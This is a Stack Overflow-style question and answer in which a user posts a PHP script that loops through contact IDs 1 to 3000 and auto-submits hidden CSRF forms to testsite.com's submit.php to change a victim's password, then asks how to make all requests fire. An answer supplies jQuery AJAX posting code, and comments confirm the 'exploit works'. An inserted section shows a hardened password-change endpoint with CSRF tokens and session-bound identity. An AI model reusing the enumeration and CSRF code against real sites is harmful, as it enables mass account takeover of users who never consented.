
In order to explain what I am trying to accomplish, here are some facts:

  • www.testsite.com is not CSRF protected, and it is possible for an attacker to change the password of a victim if he knows the e-mail of the victim and his unique contactid.
  • Every new user gains a new ID simply by auto-incrementing by 1. There are only 3000 contactIDs right now, so that means 1, 2, 3, 4, 5, 6 --> 3000.
  • If an attacker knows the e-mail of a victim, he can simply keep guessing contactIDs (a maximum of 3000) and then he can change it. I want to do this automatically.

I am trying to create a PHP script to learn more about code and to show how simple this is. I am not a malicious hacker or anything close.

So I figured that I could just use a loop that auto increments contactIDs and then posts the data to the www.testsite.com. The problem is, it does not send all the POST requests (with contactID=1 and another one with contactID=2 etc)... Here is my code:

<?php

echo "I set the password to 'stackoverflow'. <br/>";

$mailadres = 1; // start value, to avoid the undefined index PHP notice.

if (isset($_GET['mailadres'])) { // I hate undefined errors
    $mailadres = $_GET['mailadres'];
}

if ($mailadres == 1) { // Tell users that they have to submit the e-mail via $_GET
    echo "usage: ./csrf.php?mailadres=victim@gmail.com <br/>";
}

$contactid = 1; // We begin with one....

while ($contactid <= 3000) { // There are no more than 3000 contactIDs at this moment.

    echo "<form name='csrf' action='http://www.testsite.com/submit.php' method='POST'>
                <input type='hidden' name='contactid' value='{$contactid}'>
                <input type='hidden' name='something' value='something'>
                <input type='hidden' name='mailadres' value='{$mailadres}'>
                <input type='hidden' name='changepassword' value='stackoverflow'>
            </form>
            <script>document.csrf.submit();</script>";
    $contactid++; // increment in order to post every contactID.
}

?>

My question is: how do I make PHP submit all these forms (contactid=1 & contactid=2 ...)?
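The facts listed in the question describe a password-change endpoint that takes the victim's contactid from the request body and carries no CSRF token. As an added example, not code from the original question or from www.testsite.com, here is how a hypothetical submit.php handler would be hardened against exactly those two weaknesses; it assumes PHP 7.3+ and uses a constructed in-memory user store in place of a real database.

```php
<?php
// Added example, not code from the original question or from www.testsite.com:
// a hardened version of a hypothetical submit.php password-change endpoint.
// Assumes PHP 7.3+; $users is a constructed in-memory stand-in for the real store.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();
$users = [1 => ['mailadres' => 'victim@example.com',
                'hash' => password_hash('old-password', PASSWORD_DEFAULT)]];
// Synchronizer token: one random secret per session, embedded in the form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function render_form(): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return "<form action='submit.php' method='POST'>
        <input type='hidden' name='csrf_token' value='{$token}'>
        <input type='password' name='currentpassword'>
        <input type='password' name='changepassword'>
        <button>Change password</button></form>";
}

function handle_change(array $post, array &$users): string {
    // Identity comes from the logged-in session, never from a posted contactid,
    // so enumerating IDs 1..3000 changes nothing for anyone but the caller.
    $id = $_SESSION['contactid'] ?? null;
    if ($id === null || !isset($users[$id])) {
        http_response_code(401);
        return 'not logged in';
    }
    // A cross-site form cannot know the session token; hash_equals avoids timing leaks.
    if (!isset($post['csrf_token'], $_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], (string)$post['csrf_token'])) {
        http_response_code(403);
        return 'invalid csrf token';
    }
    // Re-authenticate before changing the credential.
    if (!password_verify($post['currentpassword'] ?? '', $users[$id]['hash'])) {
        http_response_code(403);
        return 'current password incorrect';
    }
    $users[$id]['hash'] = password_hash($post['changepassword'] ?? '', PASSWORD_DEFAULT);
    session_regenerate_id(true); // rotate the session after a credential change
    return 'password changed';
}
echo ($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST' ? handle_change($_POST, $users) : render_form();
```

With the token check in place, a request from a page on another origin fails with 403 before any password is touched, and the `samesite` cookie flag stops the browser from attaching the session cookie to a cross-site POST in the first place.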

1 Answer


Firstly you need to get rid of the action, method etc in the form. Let it be simple like below:

<form id="form1">
.....
</form>

Then you need to give ids to the elements, using the same value as given in 'name'. For example:

<input type='hidden' name='contactid' id='contactid' value='{$contactid}'>

Then have a button with onClick() and trigger a function, like

<button id="button1" onclick="postData()">PostData</button>

Then have a function like this:

// requires jQuery to be loaded on the page for $.ajax
function postData(d1, d2, d3, d4) {
    $.ajax({
        url: 'http://www.testsite.com/submit.php',
        data: {
            data1: d1,
            data2: d2,
            data3: d3,
            data4: d4
        },
        type: 'POST',
        success: function(result) {
            // code for success
        },
        error: function(jqXHR, textStatus, errorThrown) {
            // code in case of error
        }
    });
}

Whenever the button click occurs, the data will be automatically posted to the given URL.

Hope this helps.

kdmurray
praveenkrishp
  • See @SergeVanHaag, in reality what happens is you write something like this. The end user fills the form and clicks the button (PostData here). Every time a user clicks the button the data is posted. There is actually no need to worry about the count. – praveenkrishp Sep 16 '16 at 06:40
  • yes, but I'm writing an exploit. It is necessary that onclick, automatically 3000 post requests happen instead of doing everything manually (that takes days). –  Sep 16 '16 at 06:42
  • Hi, I guess this could solve your query, [link](http://stackoverflow.com/questions/2381572/how-can-i-trigger-a-javascript-event-click/2381612#2381612). Though this is not advisable. – praveenkrishp Sep 16 '16 at 06:50
  • Hi Praveenkrishp. The method that you sent me was not efficient. It would open like 3000 tabs. I can do that same thing by just changing
    to
    ... It's not more efficient. Still thanks though, my exploit works just fine with the setTimeout. –  Sep 17 '16 at 10:45